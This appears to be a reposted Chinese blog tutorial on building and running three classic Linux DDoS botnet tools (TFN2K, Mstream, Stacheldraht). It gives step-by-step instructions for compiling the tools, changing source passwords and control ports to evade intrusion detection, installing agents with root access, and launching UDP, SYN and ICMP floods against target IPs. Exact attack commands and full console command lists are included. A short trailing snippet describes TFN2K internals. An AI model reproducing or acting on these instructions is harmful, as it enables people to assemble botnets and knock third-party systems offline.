linux下的3种DDOS软件介绍

什么是TFN2K?
TFN2K 的作者是著名的德国黑客mixter.
http://mixter.void.ru/papers.html

TFN2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的

UNIX、Solaris和Windows NT等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统

平台上。

TFN2K由两部分组成:在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发

送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主

机,能够在攻击过程中相互协同,保证攻击的连续性。主控央和代理端的网络通讯是经过加密的,还可

能混杂了许多虚假数据包。整个TFN2K网络可能使用不同的TCP、UDP或ICMP包进行通讯。而且主控端还能

伪造其IP地址。所有这些特性都使发展防御 TFN2K攻击的策略和技术都非常困难或效率低下。


如何使用TFN2K?
--------------

我的使用环境:Linux

1, 解压
tar zxvf tfn2k.tgz
2, 修改
a. src/Makefile 
如果你的系统是linux系统,不需要做任何修就可以, 如果你想生产Windows下的代理端,需要做

一 些修改,但是我编译后的文件在Win2000 & WinXP下出错。
b. src/ip.h 
注释掉以下部分,否则编译出错。 

  

3,编译
a. cd tfn2k
make
或者: 
b. cd tfn2k/src 
make 
在提示设置密码后,会生成 tfn 和 td 两个文件,其中 tfn 是控制段,td 是守护进程。 

4, 安装 td
自己去安装吧,需要root权限。

5, 攻击
a. 编辑一个文本文件,将安装了 td 的机器的ip地址添加进去, 格式为: 

ip
ip
...
...

b. 测试代理端(可选) 
./tfn -f host.txt -c 10 -i "mkdir /tmp/test_TFN2K"
检查安装了 td 的机器是否存在 /tmp/test_TFN2K 目录

c. ./tfn 列出命令的格式和参数
./tfn -f host -c 4 -i 1.1.1.1 对1.1.1.1发动 UDP flood 攻击

######################### Mstream ##############################

mstream的源程序共有两个文件:master.c 和 server.c
其中server.c用于生成agent端程序server, master.c用于生成控制端程序 master.

简单使用流程:

client(s)-->handler(s)-->agent(s)-->victim(s)

clent: attacker所在主机
handler: 运行 master 程序
agent: 运行 server 程序
victim: 被攻击主机

1, 修改源程序以符合自己的要求
注: 修改口令能防止自己的agent被滥用, 修改控制端口利于躲避IDS的探测.

server.c
-----------------------------
#define PASSWORD "pssword"
#define SERVERFILE ".sr"
#define MASTER_TCP_PORT 6723
#define MASTER_UDP_PORT 9325
#define SERVER_PORT 7983
#define MAXUSERS 3
#define USED 1
#define AUTH 2
#define max(one, two) (one > two ? one : two)
...
....
-------------------------------
其中比较关键是:
#define PASSWORD "pssword" 将"password"替换成你自己的密码
#define MASTER_TCP_PORT 6723 和 #define MASTER_UDP_PORT 9325 是设置控制端口需要和master.c中

一致.

master.c
---------------------------------------
char *m[]={
"1.1.1.1",
"2.2.2.2",
"3.3.3.3",
0 };

#define MASTER_PORT 9325
#define SERVER_PORT 7983
...
...
-----------------------------------------
char *m[]={
"1.1.1.1",
"2.2.2.2",
"3.3.3.3",
0 };
以上的ip地址要根据需要设置成你自己的.

#define MASTER_PORT 9325
#define SERVER_PORT 7983
以上端口要和server.c中的设置一致.

2, 编译
gcc -o master master.c
gcc -o server server.c

3, 安装
自己选择合适的机器安装master和server程序. 并运行.

4, 使用
a. telnet ip port # ip 为运行master的主机, port为编译时设置的master_port
输入编译时设置的密码后, 进入handler控制模式:

如下:
--------------------
# telnet 1.1.1.1 6723
Trying 1.1.1.1...
Connected to 1.1.1.1 (1.1.1.1).
Escape character is '^]'.
password
> help

Available commands: 
stream -- stream attack !
servers -- Prints all known servers.
ping -- ping all servers.
who -- tells you the ips of the people logged in
mstream -- lets you stream more than one ip at a time

----------------------
命令简介:
注:测试中我发现我这个版本的stream命令没有效果,均使用mstream发起攻击。

servers
显示当前所有已知Agents
who
显示当前已建立连接的用户
ping
确认Agents的活动状态。对所有已知Agents发送"ping",每收到一个"pong"回应
就报告用户。
stream
针对单个主机攻击,seconds指定攻击持续时间。Handler将主机名解析成IP地址
并发送命令"mstream/arg1:arg1/arg2"到所有Agents,这里arg1是victim目标IP
地址,arg2是攻击持续时间。
mstream
针对多台主机攻击,seconds指定攻击持续时间。Handler发送命令
"mstream/arg1/arg2"到所有Agents,这里arg1是冒号分隔的victim目标IP地址
列表,arg2是攻击持续时间。
quit
终止Attacker到Handler的连接 


b. > mstream 123.123.123.123 60
对主机123.123.123.123发动60秒攻击

> mstream 1.1.1.1:2.2.2.2:3.3.3.3 60
对多台主机同时发起攻击


######################### stacheldraht ##############################

Stacheldraht攻击网络由一个或多个主控程序("mserv.c")和大量的代理程序("leaf/td.c")组

成,同时还有用于提供加密功能的网络连接和通讯程序("telnet.c/client.c")。一个典型网络结构如

下:

攻击者-->主控端-->代理端-->受害者

1, 解压
# tar zvfz stachel.tgz
# cd stacheldrahtV4
# ls -l
total 136
-rw-r--r-- 1 root root 13232 Aug 25 1999 bf_tab.h
-rw-r--r-- 1 root root 6597 Aug 25 1999 blowfish.c
-rw-r--r-- 1 root root 1291 Aug 25 1999 blowfish.h
-rw-r--r-- 1 root root 1276 Feb 5 2000 config.h
drwxr-xr-x 2 root root 4096 Dec 13 11:15 leaf
-rw-r--r-- 1 root root 167 Sep 16 1999 Makefile
-rwxr-xr-x 1 root root 46244 Dec 13 10:12 mserv
-rw-r--r-- 1 root root 39685 Dec 13 11:01 mserv.c
drwxr-xr-x 2 root root 4096 Dec 13 11:08 telnetc
-rw-r--r-- 1 root root 3089 Aug 25 1999 tubby.h


2,修改源代码(注:行数仅供参考)

a、stacheldrahtV4/leaf/control.h
下述部分需要注释掉
-------------------------------------------------------
12



b、端口:
下面三个程序的端口要设置对应,即mserv.c的MSERVERPORT和COMMANDPORT要和td.c、client.c对应


密码:
本部分比较关键,很多在编译完成后用clinet连接主控端的时候不知道口令, 因为口令是用3DES加

密后放在
mesrv.c 的 24 //#define SALT "dRFWfIGlF0zrE" , "dRFWfIGlF0zrE"就是加密后的口令. 它

是用口令的明文和client.c中的
"zA" (175 strcpy(result,crypt(password,"zA")):)经过3DES加密后的结果。
因为流传到你手中的源代码几乎肯定是被人修改过的, 多以我们需要重新建立自己的密码。可以用

下面的代码:
crypt.c
--------------------------------------
#include
#include

int main() // int argc, char **argv)
{
char *input = "11111111";
char *salt = "zA";
printf("%s ", crypt(input, salt));
return 0;
}
----------------------------------------
# gcc -lcrypt -o crypt crypt.c
# ./crypt
zAj9s/lEcOIC. //此为密码明文11111111和zA加密后的密文
将密文"zAj9s/lEcOIC."替换mesrv.c 的"dRFWfIGlF0zrE"(24 //#define SALT "dRFWfIGlF0zrE")
注意""需要保留. 此时编译后的密码为"11111111" 。

td.c
-----------------------------------------
38 -
39 #define MSERVER1 "10.2.0.100"
40 #define MSERVER2 "192.168.0.84"

59 #define COMMANDPORT 65513



mserv.c
-------------------------------------------
23

25 #define SALT "zAj9s/lEcOIC."
26 
27
28 #define MSERVERPORT 65512

37 #define LOCALIP "10.2.0.100"

41
42 #define COMMANDPORT 65513


client.c
-----------------------------------------------
24 #define MASTERSERVERPORT 65512
25 #define timeout 10
175 strcpy(result,crypt(password,"zA"));

3、编译
分别在3个目录中运行make后,生成了文件mesrv、clinet和td。

4、安装
将client和mesrv安装到你需要(能够)安装的机器,并运行。

5、使用
# ./client 1.1.1.1 //安装了msecrv的机器的ip
[*] stacheldraht [*] 
(c) in 1999 by randomizer

trying to connect...
connection established.
--------------------------------------
enter the passphrase : 11111111 //我们设置的密码是"11111111"
--------------------------------------
entering interactive session.
******************************
welcome to stacheldraht 
******************************
type .help if you are lame

stacheldraht(status: a!1 d!0)> //提示的"a!1 d!0"表示当前有活动和停止的代理端主机数量

stacheldraht(status: a!1 d!0)>.help
available commands in this version are:
--------------------------------------------------
.mtimer .mudp .micmp .msyn .msort .mping
.madd .mlist .msadd .msrem .distro .help
.setusize .setisize .mdie .sprange .mstop .killall
.showdead .showalive
--------------------------------------------------
stacheldraht(status: a!1 d!0)>

使用命令如下:


.distro user server
通知代理端程序使用"rcp"命令将其自身在主机"server"以"user"帐号安装并运行。

.help
显示帮助信息。

.killall
杀死所有活动的代理端程序。

.madd ip1[:ip2[:ipN]]
添加IP地址到攻击目标列表中。

.mdie
向所有代理端程序发送"die"请求。

.mdos
启动拒绝服务攻击。

.micmp ip1[:ip2[:ipN]]
启动针对指定主机的ICMP flood攻击。

.mlist
列出当前正被进行拒绝服务攻击的主机IP地址。

.mping
测试所有的代理端是否仍在活动。

.msadd
添加新的主控端主机到列表中。

.msort
排序输出已停止/正活动的代理端。

.mstop ip1[:ip2[:ipN]]
.mstop all
停止指定IP地址或所有的攻击。

.msrem
从列表中删除一个主控端主机。

.msyn ip1[:ip2[:ipN]]
启动对指定主机的SYN flood攻击。

.mtimer seconds
设置攻击持续时间。

.mudp ip1[:ip2[:ipN]]
启动对指定主机的UDP flood攻击。

.setisize
设置ICMP攻击包大小(最大:1024,缺省:1024)。

.setusize
设置UDP攻击包大小(最大:1024,缺省:1024)。

.showalive
显示所有“正活动”的代理端主机。

.showdead
显示所有“已停止”的代理端主机。

.sprange lowport-highport
设置SYN flood攻击的端口范围(缺省为0-140)。

转载于:https://www.cnblogs.com/tonykan/p/3514732.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
  什么是tfn2k?   tfn2k通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的unix、solaris和windows nt等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统平台上。   tfn2k由两部分组成:在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主机,能够在攻击过程中相互协同,保证攻击的连续性。主控央和代理端的网络通讯是经过加密的,还可能混杂了许多虚假数据包。整个tfn2k网络可能使用不同的tcp、udp或icmp包进行通讯。而且主控端还能伪造其ip地址。所有这些特性都使发展防御 tfn2k攻击的策略和技术都非常困难或效率低下。   tfn2k的技术内幕   ◆ 主控端通过tcp、udp、icmp或随机性使用其中之一的数据包向代理端主机   发送命令。对目标的攻击方法包括tcp/syn、udp、icmp/ping或broadcast   ping (smurf)数据包flood等。   ◆ 主控端与代理端之间数据包的头信息也是随机的,除了icmp总是使用   icmp_echoreply类型数据包。   ◆ 与其上一代版本tfn不同,tfn2k的守护程序是完全沉默的,它不会对接收   到的命令有任何回应。客户端重复发送每一个命令20次,并且认为守护程   序应该至少能接收到其中一个。   ◆ 这些命令数据包可能混杂了许多发送到随机ip地址的伪造数据包。   ◆ tfn2k命令不是基于字符串的,而采用了"++"格式,其中是   代表某个特定命令的数值,则是该命令的参数。   ◆ 所有命令都经过了cast-256算法(rfc 2612)加密。加密关键字在程序编   译时定义,并作为tfn2k客户端程序的口令。   ◆ 所有加密数据在发送前都被编码(base 64)成可打印的ascii字符。tfn2k   守护程序接收数据包并解密数据。   ◆ 守护进程为每一个攻击产生子进程。   ◆ tfn2k守护进程试图通过修改argv[0]内容(或在某些平台中修改进程名)   以掩饰自己。伪造的进程名在编译时指定,因此每次安装时都有可能不同。   这个功能使tfn2k伪装成代理端主机的普通正常进程。因此,只是简单地检   查进程列表未必能找到tfn2k守护进程(及其子进程)。   ◆ 来自每一个客户端或守护进程的所有数据包都可能被伪造。   监测tfn2k的特征

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值